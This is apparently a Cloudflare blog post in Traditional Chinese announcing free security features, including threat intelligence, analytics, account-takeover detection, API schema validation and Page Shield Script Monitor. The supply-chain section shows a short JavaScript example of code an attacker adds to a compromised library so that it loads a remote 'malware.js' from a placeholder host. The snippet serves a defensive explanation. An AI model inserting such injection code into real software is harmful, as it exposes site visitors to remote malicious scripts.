訂閱以接收新文章的通知:

利用 Cloudflare 解決方案打造一個更安全的網際網路:免費的威脅情報、分析和新威脅偵測

2024-09-24

閱讀時間:10 分鐘
本貼文還提供以下語言版本:EnglishFrançaisDeutsch日本語한국어Español简体中文

使用網際網路的任何人每天都可能會接觸 Cloudflare 的網路,要么使用我們的 1.1.1.1 解析程式存取受 Cloudflare 保護的網站,要么透過使用我們的 Cloudflare One 產品的網路進行連線。

這讓 Cloudflare 肩負重大責任,為全球數十億使用者提供更安全的網際網路。今天,我們向所有客戶免費提供威脅情報和 10 多種新的安全功能。無論是使用 Cloudflare 來保護自己的網站、家庭網路還是辦公室,您都會發現一些有用的功能,只需幾次點擊就能開始使用。

這些功能著重於解決網路安全中一些日益增長的重大問題,包括帳戶盜用攻擊供應鏈攻擊針對 API 端點的攻擊網路可見性以及網路資料外洩

為每個人提供更高的安全性

您可以在下面的章節中閱讀有關每一項功能的更多資訊,但在這裡,我們想提前提供一個簡短的摘要。

如果您是網路安全愛好者:您可以前往我們全新的 Cloudforce One 威脅情報網站,瞭解威脅執行者、攻擊活動和其他網際網路安全問題。

如果您是網站擁有者:從今天開始,所有免費方案都可以存取其區域的安全性分析。此外,我們還透過 GraphQL 向所有人提供 DNS 分析

獲得可見性後,只需要將好的流量與惡意流量區分開來。所有客戶都可以使用始終開啟的帳戶盜用攻擊偵測API 結構描述驗證(用於在其 API 端點上實施主動安全模型),以及 Page Shield 指令碼監視器,來提供對您正在載入的第三方資產(可能被用於執行基於供應鏈的攻擊)的可見性。 如果您使用 Cloudflare 來保護您的人員和網路:我們將把一些 Cloudflare One 產品捆綁到一個新的免費產品中。套裝組合中將包括我們目前免費提供的 Zero Trust 產品,以及一些新產品,例如 Magic Network Monitoring(提供網路可見性)、資料遺失防護(保護敏感資料)以及 Digital Experience Monitoring(衡量網路連線與效能)。Cloudflare 是唯一提供這些產品類別的免費版本的廠商。

如果您是新使用者:我們提供了新的驗證選項。從今天開始,我們將推出使用 Google 驗證來註冊和登入 Cloudflare 的選項,這將讓我們的一些客戶更容易登入,並減少對記住密碼的依賴,從而降低其 Cloudflare 帳戶被入侵的風險。

下面請看詳細介紹:

威脅情報與分析

Cloudforce One

我們的威脅研究和營運團隊 Cloudforce One 很高興地宣佈推出一個可免費存取的專用威脅情報網站。我們將透過這個網站發佈關於最新威脅行為者活動和策略的技術和管理資訊,以及關於新興惡意程式碼、漏洞和攻擊的見解。

我們還將發佈兩則新的威脅情報,並承諾發佈更多威脅情報。歡迎造訪新網站以查看最新研究報告,該研究報告涵蓋針對南亞和東亞區域組織的一個持久性的、與國家結盟的行為者,以及雙重經紀貨運詐欺的興起。

訂閱即可接收有關未來威脅研究的電子郵件通知。

安全性分析

安全性分析為您提供了一個涵蓋所有 HTTP 流量的安全性視角,不僅涵蓋已緩解的請求,還讓您能夠專注於最重要的事情:被視為惡意但可能未緩解的流量。這意味著,除了使用安全事件來檢視我們的應用程式安全性產品套件採取的安全動作外,您還可以使用安全性分析來審查所有流量是否存在異常或奇怪的行為,然後使用所獲得的深入解析來根據具體的流量模式製定精確的緩解規則。從今天開始,我們將向所有方案的客戶提供這一視角。 Free 方案和 Pro 方案使用者現在可以存取安全性分析的新儀表板,您可以在流量分析圖表中檢視流量的高階概述,其中提供分組和篩選功能,以便您可以輕鬆地將異常歸零。您還可以查看多個維度的熱門統計資料和篩選器,包括國家/地區、來源瀏覽器、來源作業系統、HTTP 版本、SSL 通訊協定版本、快取狀態和安全性動作。

DNS 分析

現在,Cloudflare 的每位使用者都可以存取全新改進的 DNS 分析儀表板,還可以透過我們強大的 GraphQL API 存取新的 DNS 分析資料集。現在,您可以輕鬆分析對您的網域進行的 DNS 查詢,這可用於排除問題、偵測模式和趨勢,或透過套用強大的篩選器和按來源分類 DNS 查詢來產生使用情況報告。 隨著 Foundation DNS 的推出,我們引進了基於 GraphQL 的新 DNS 分析,但這些分析先前僅適用於使用進階名稱伺服器的區域。然而,由於這些分析提供了深入的見解,我們認為這項功能應該向所有人提供。從今天開始,可以使用 DNS 部分中「分析」下的 Cloudflare 權威 DNS 服務在每個區域存取基於 GraphQL 的新 DNS 分析。

應用程式威脅偵測和緩解

帳戶盜用偵測

由於密碼重複使用以及大型資料外洩事件的頻率不斷上升,65% 的網際網路使用者容易遭受帳戶盜用 (ATO)。幫助構建更好的網際網路意味著讓每個人都能輕鬆保護關鍵帳戶。

從今天開始,我們將免費向所有人(從個人使用者到大型企業)提供可靠的帳戶安全性,幫助防止憑證填充和其他 ATO 攻擊,並且免費提供憑證洩露檢查和 ATO 偵測等增強功能。 

這些更新包括自動登入偵測、只需最少設定的暴力密碼破解嘗試預防,以及擁有超過 150 億個密碼的綜合外洩憑證資料庫,其中除了我們自己的資料庫之外,還包含來自 Have I Been Pwned (HIBP) 服務的洩漏密碼。客戶可以透過 Cloudflare 的 WAF 功能對洩漏憑證請求採取動作,例如限速規則自訂規則,或者可以在源站採取動作,實施多重要素驗證 (MFA) 或根據傳送到來源的標頭要求密碼重設。

設定非常簡單:Free 方案使用者會獲得自動偵測,而付費使用者可以在 Cloudflare 儀表板中一鍵啟用新功能。有關設定和配置的更多詳細資料,請參閱我們的文件。立即開始使用吧!

API 結構描述驗證

API 流量佔 Cloudflare 網路上動態流量的一半以上。API 的流行帶來了一系列全新的攻擊媒介。Cloudflare API Shield 的結構描述驗證是為應對這些新威脅而增強 API 安全性的第一步。

這是有史以來第一次,任何 Cloudflare 客戶都可以使用結構描述驗證,確保僅有效的 API 請求才能到達其來源伺服器。

此功能可以防止由於錯誤而導致的意外資訊洩露,阻止開發人員透過非標準流程隨意暴露端點,並自動封鎖殭屍 API,因為您的 API 清單作為 CI/CD 流程的一部分保持最新。

我們建議您使用 Cloudflare 的 API 或 Terraform 提供者將端點新增至 Cloudflare API Shield,並在程式碼作為建置後 CI/CD 流程的一部分發佈後更新結構描述。這樣,API Shield 就成為首選的 API 清單工具,結構描述驗證將處理對您的 API 發出的任何非預期請求。

雖然 API 都是為了與第三方整合,但有時整合是透過將庫直接載入到應用程式中來完成的。接下來,我們將透過保護使用者免受惡意第三方指令碼的侵害來幫助保護更多的 Web,這些惡意指令碼會從您頁面上的輸入中竊取敏感性資訊。

供應鏈攻擊預防

現代 Web 應用程式透過使用第三方 JavaScript 程式庫來改善使用者體驗並減少開發時間。由於其對頁面上的所有內容擁有特權存取層級,遭入侵的第三方 JavaScript 程式庫可以秘密地將敏感性資訊洩露給攻擊者,而終端使用者或網站管理員卻不會意識到這種情況的發生。 為了應對這種威脅,我們在三年前推出了 Page Shield。我們現在向所有使用者免費發佈 Page Shield 的 Script Monitor。

使用 Script Monitor,您將看到頁面上載入的所有 JavaScript 資源,而不僅僅是開發人員包含的資源。這種可見性包括由其他指令碼動態載入的指令碼!一旦攻擊者入侵了該程式庫,無需變更原始 HTML 上下文,只需在現有包含的 JavaScript 資產中包含新程式碼,即可新增新的惡意指令碼:

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

pollyfill.io 程式庫變更擁有權的訊息傳出時,Script Monitor 發揮了至關重要的作用。Script Monitor 使用者可以立即查看其網站上載入的指令碼,並且可以快速輕鬆地瞭解自己是否面臨風險。

我們很高興透過向所有客戶提供 Script Monitor,將這些指令碼的可見性延伸到盡可能多的 Web。您可以查看這裡的文件,瞭解如何開始。

Page Shield 的現有使用者可以立即篩選監控的資料,以瞭解其應用程式是否使用了 polyfill.io(或任何其他程式庫)。此外,我們還建立了一個 polyfill.io 重寫來回應遭入侵的服務,該服務已於 2024 年 6 月為 Free 方案自動啟用。

Turnstile 作為 Google Firebase 擴充功能

我們很高興地宣佈推出適用於 Google Firebase 的 Cloudflare Turnstile App Check Provider,提供無需手動設定的無縫整合。這個新的擴充功能允許開發人員在 Firebase 上建立行動或 Web 應用程式,以使用 Cloudflare 的 CAPTCHA 替代方案來保護其專案免受機器人的侵害。透過利用 Turnstile 的機器人偵測和查問功能,您可以確保只有真實的人類訪客與您的 Firebase 後端服務互動,從而增強安全性和使用者體驗。Cloudflare Turnstile 是一款注重隱私的 CAPTCHA 替代品,可在不影響使用者體驗的情況下區分人類和機器人。與使用者經常放棄的傳統 CAPTCHA 解決方案不同,Turnstile 以不可見的方式運作,並提供各種模式來確保順暢的使用者互動。

Turnstile 的 Firebase App Check 擴充功能易於整合,讓開發人員能夠以最少的設定快速提升應用程式安全性。此擴充功能也可免費透過 Turnstile 的 Free 方案無限使用。透過結合 Google Firebase 的後端服務和 Cloudflare Turnstile 的優勢,開發人員可以為其使用者提供安全和順暢的體驗。

Cloudflare One

Cloudflare One 是一個全面的安全存取服務邊緣 (SASE) 平台,旨在保護和連接網際網路上的人員、應用程式、裝置和網路。它將 Zero Trust 網路存取 (ZTNA)、安全 Web 閘道 (SWG) 等服務整合到單一解決方案中。Cloudflare One 可以幫助每個人保護人員和網路,管理存取控制,防範網路威脅,保護資料,以及透過 Cloudflare 的全球網路路由網路流量,從而提高網路效能。它透過提供基於雲端的方法來取代傳統的安全措施,以保護和簡化對企業資源的存取。

現在,每個人都可以免費使用過去兩年來新增到 Cloudflare One 的四款新產品:

以下是對 Cloudflare One 平台中現有網路安全產品的補充:

  • Access,用於驗證使用者身分,只允許他們使用應該使用的應用程式。

  • Gateway,用於保護進入公用網際網路和進入您的私人網路的網路流量。

  • Cloudflare Tunnel,我們的應用程式連接器,其中包括 cloudflared 和 WARP Connector,用於將不同的應用程式、伺服器和私人網路連接到 Cloudflare 網路。

  • Cloudflare WARP,我們的裝置代理程式,用於將流量從筆記型電腦或行動裝置安全地傳送到網際網路。

任何擁有 Cloudflare 帳戶的人都將自動獲得 50 個免費席位,可以使用其 Cloudflare One 組織中的所有產品。請造訪我們的 Zero Trust 和 SASE 計畫頁面,進一步瞭解我們的免費產品,以及瞭解我們針對 50 名成員以上團隊的隨用隨付和合約計畫。

使用 Google 進行驗證

Cloudflare 儀表板本身已成為需要保護的重要資源,我們花費大量時間確保 Cloudflare 使用者帳戶不會遭到入侵。

為此,我們透過新增額外的驗證方法來提高安全性,包括基於應用程式的雙重驗證 (2FA)、通行金鑰、SSO 和使用 Apple 登入。今天,我們增加了使用 Google 帳戶註冊和登入的功能。 

Cloudflare 支援多種針對不同使用案例自訂的驗證工作流程。雖然 SSO 和通行金鑰是首選且最安全的驗證方法,但我們認為提供比密碼更強的驗證因素將填補一個空白,並提高使用者的整體平均安全性。使用 Google 登入可讓使用者變得更輕鬆,讓他們在已經使用 Google 身分瀏覽 Web 時,無需再記住另一個密碼。

「使用 Google 登入」基於 OAuth 2.0 規範,並允許 Google 安全地分享有關特定身分的識別資訊,同時確保是由 Google 提供此資訊,從而防止任何惡意實體冒充 Google。

這意味著我們可以將身分驗證委託給 Google,從而防止直接針對此 Cloudflare 身分進行零知識攻擊。

進入 Cloudflare 登入頁面後,您將看到下面的按鈕。點擊它即可註冊 Cloudflare,註冊後,您無需輸入密碼即可使用您在 Google 帳戶中設定的任何現有保護措施進行登入。

隨著此功能的推出,Cloudflare 現在使用自己的 Cloudflare Workers 為 OIDC 相容的身分識別提供者(例如 GitHub 和 Microsoft 帳戶)提供抽象層,這意味著我們的使用者可以期待在未來看到更多身分識別提供者 (IdP) 連線支援。

目前,只有註冊 Google 的新客戶才能使用其 Google 帳戶登入,但我們今後將為更多使用者實現這一點,並能夠連結/取消連結社交登入提供者,以及我們將新增其他社交登入方法。已建立 SSO 設定的 Enterprise 方案使用者目前將無法使用此方法,而基於 Google Workspace 建立 SSO 設定的使用者將被轉發到其 SSO 流程,因為我們正在考慮如何簡化設定用於限制您的 Cloudflare 環境的 Access 和 IdP 原則。

如果您是 Cloudflare 新使用者,並且擁有 Google 帳戶,那麼開始使用 Cloudflare 來保護您的網站、建立新服務或嘗試 Cloudflare 提供的任何其他服務比以往任何時候都更容易。

更安全的網際網路

Cloudflare 的目標之一是讓網路安全工具大眾化,讓不擁有大型企業組織資源的個人也能安全地提供內容和連接到網際網路。

我們決定向所有 Cloudflare 使用者免費提供大量新功能,涵蓋廣泛的安全使用案例,適用於 Web 管理員、網路管理員和網路安全愛好者。 登入您的 Cloudflare 帳戶,立即開始使用這些公告提供的優勢。歡迎在我們的社群論壇上提供意見反應。我們致力於改進現有功能,並在未來推出新功能。

在 Cloudflare TV 上觀看

我們保護整個企業網路,協助客戶有效地建置網際網路規模的應用程式,加速任何網站或網際網路應用程式抵禦 DDoS 攻擊,阻止駭客入侵,並且可以協助您實現 Zero Trust

從任何裝置造訪 1.1.1.1,即可開始使用我們的免費應用程式,讓您的網際網路更快速、更安全。

若要進一步瞭解我們協助打造更好的網際網路的使命,請從這裡開始。如果您正在尋找新的職業方向,請查看我們的職缺
Birthday Week安全性CASBDLPData Loss PreventionThreat IntelligenceZero TrustCloudflare OnePage ShieldLeaked Credential ChecksSASE

在 X 上進行關注

Michael Tremante|@MichaelTremante
Reid Tatoris|@reidtatoris
Cloudflare|@cloudflare

相關貼文

2024年10月23日 下午1:00

Fearless SSH: short-lived certificates bring Zero Trust to infrastructure

Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration. ...